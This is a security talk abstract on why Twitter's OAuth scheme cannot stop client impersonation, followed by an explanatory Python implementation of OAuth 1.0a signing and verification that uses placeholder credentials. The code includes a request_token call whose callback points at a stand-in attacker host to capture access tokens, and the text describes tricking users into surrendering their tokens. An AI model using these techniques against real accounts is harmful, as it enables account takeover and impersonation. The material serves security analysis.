Since March 2013, Twitter's new web API requires every request to be signed with OAuth. This mechanism is supposed to prevent abuse and also to let Twitter ban third-party clients that do not adhere to its new, much stricter terms of service. After studying how the Twitter API uses OAuth, it turns out that the required authentication is ineffective at letting Twitter control third-party applications: the API identifies an application only by its OAuth consumer key and secret (the "consumer tokens"), so a rogue client that holds a 'blessed' client's consumer tokens can impersonate it and access the API unnoticed. Consumer tokens are supposed to be kept secret, but we'll see various fun and dynamic reverse engineering techniques for extracting them from popular Twitter clients, including the latest versions for OS X and iOS.

We also found that Twitter allows several third-party clients to redirect access tokens to a URL defined by the client. Since you can impersonate the client, you can redirect the access tokens to your own pirate server. I'll explain how to trick someone into giving you access tokens for their account without them noticing and without ever leaving Twitter's secure website. I'll end by discussing the Twitter API from a security standpoint and argue that, to a great extent, many of the issues stem from one fundamental mistake: taking OAuth authentication from the web to the desktop.
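How the impersonation works, as an added example that is not part of the talk and not code from any Twitter client: an OAuth 1.0a HMAC-SHA1 signer and the matching server-side check, both written from RFC 5849. All keys, secrets, nonces and the attacker URL are constructed placeholders, the endpoints are illustrative, and nothing here talks to Twitter.

```python
# Added illustration of OAuth 1.0a (RFC 5849) HMAC-SHA1 signing, client and
# server side. Not the talk's or any Twitter client's code; every credential,
# nonce and URL below is a constructed placeholder.
import base64
import hashlib
import hmac
import secrets
import time
from urllib.parse import quote

# Constructed placeholder credentials (not real Twitter keys).
CONSUMER_KEY = "blessed-client-key"
CONSUMER_SECRET = "blessed-client-secret"
ACCESS_TOKEN = "user-access-token"
ACCESS_TOKEN_SECRET = "user-access-token-secret"

# What the provider stores: an app is identified by its consumer key alone.
APP_REGISTRY = {CONSUMER_KEY: CONSUMER_SECRET}
TOKEN_REGISTRY = {ACCESS_TOKEN: ACCESS_TOKEN_SECRET}


def pct(value):
    """RFC 3986 percent-encoding as required by RFC 5849 section 3.6."""
    return quote(str(value), safe="~")


def signature_base_string(method, base_url, params):
    """RFC 5849 section 3.4.1. `params` holds the query/body parameters and
    the oauth_* parameters, but never oauth_signature itself."""
    encoded = sorted((pct(k), pct(v)) for k, v in params.items())
    normalized = "&".join(f"{k}={v}" for k, v in encoded)
    return "&".join([method.upper(), pct(base_url), pct(normalized)])


def hmac_sha1_signature(base_string, consumer_secret, token_secret=""):
    """RFC 5849 section 3.4.2: key = consumer secret '&' token secret."""
    key = f"{pct(consumer_secret)}&{pct(token_secret)}".encode()
    digest = hmac.new(key, base_string.encode(), hashlib.sha1).digest()
    return base64.b64encode(digest).decode()


def sign_request(method, url, params, consumer_key, consumer_secret,
                 token="", token_secret="", extra_oauth=None,
                 nonce=None, timestamp=None):
    """Client side: return the oauth_* parameters, signature included.
    A fixed nonce/timestamp makes the output reproducible for testing."""
    oauth = {
        "oauth_consumer_key": consumer_key,
        "oauth_nonce": nonce or secrets.token_hex(16),
        "oauth_signature_method": "HMAC-SHA1",
        "oauth_timestamp": timestamp or str(int(time.time())),
        "oauth_version": "1.0",
    }
    if token:
        oauth["oauth_token"] = token
    oauth.update(extra_oauth or {})
    base = signature_base_string(method, url, {**params, **oauth})
    oauth["oauth_signature"] = hmac_sha1_signature(base, consumer_secret, token_secret)
    return oauth


def authorization_header(oauth):
    """RFC 5849 section 3.5.1 form: Authorization: OAuth k="v", k="v", ..."""
    return "OAuth " + ", ".join(f'{pct(k)}="{pct(v)}"' for k, v in sorted(oauth.items()))


def server_verify(method, url, params, oauth):
    """Server side: all the provider can check is that the consumer key is
    registered and the HMAC matches. Nothing proves which binary signed it."""
    consumer_secret = APP_REGISTRY.get(oauth.get("oauth_consumer_key"))
    if consumer_secret is None:
        return False
    token_secret = TOKEN_REGISTRY.get(oauth.get("oauth_token", ""), "")
    unsigned = {k: v for k, v in oauth.items() if k != "oauth_signature"}
    base = signature_base_string(method, url, {**params, **unsigned})
    expected = hmac_sha1_signature(base, consumer_secret, token_secret)
    return hmac.compare_digest(expected, oauth.get("oauth_signature", ""))


def timeline_request(consumer_secret, nonce="n0", timestamp="1364000000"):
    """Any client holding the blessed key's secret produces exactly the
    signature the genuine client would; the server accepts it as that app."""
    url = "https://api.twitter.com/1.1/statuses/home_timeline.json"  # illustrative
    params = {"count": "5"}
    oauth = sign_request("GET", url, params, CONSUMER_KEY, consumer_secret,
                         ACCESS_TOKEN, ACCESS_TOKEN_SECRET,
                         nonce=nonce, timestamp=timestamp)
    return oauth, server_verify("GET", url, params, oauth)


def request_token_with_callback(callback, nonce="n1", timestamp="1364000001"):
    """Step 1 of the OAuth 1.0a dance under the blessed key, with oauth_callback
    chosen by the rogue client. If the provider honours client-supplied
    callbacks, the verifier (and so the access token) lands on that URL."""
    url = "https://api.twitter.com/oauth/request_token"  # illustrative
    oauth = sign_request("POST", url, {}, CONSUMER_KEY, CONSUMER_SECRET,
                         extra_oauth={"oauth_callback": callback},
                         nonce=nonce, timestamp=timestamp)
    return oauth, server_verify("POST", url, {}, oauth)


if __name__ == "__main__":
    blessed, ok_b = timeline_request(CONSUMER_SECRET)
    rogue, ok_r = timeline_request(CONSUMER_SECRET)
    print("identical signature:", blessed["oauth_signature"] == rogue["oauth_signature"])
    print("server accepts both:", ok_b and ok_r)
    print(authorization_header(rogue))
    _, ok_t = request_token_with_callback("https://attacker.example/collect")
    print("request_token with attacker callback accepted:", ok_t)
```

The provider's check reduces to "is this consumer key registered, and does the HMAC over the request verify with its secret"; a request signed with an extracted consumer secret is byte-for-byte what the genuine client would send, so there is nothing left for the server to ban on. The same key also signs a request_token call whose oauth_callback names a URL the rogue client picked, which is the redirect the abstract describes whenever the provider honours client-supplied callbacks instead of a callback locked at registration time.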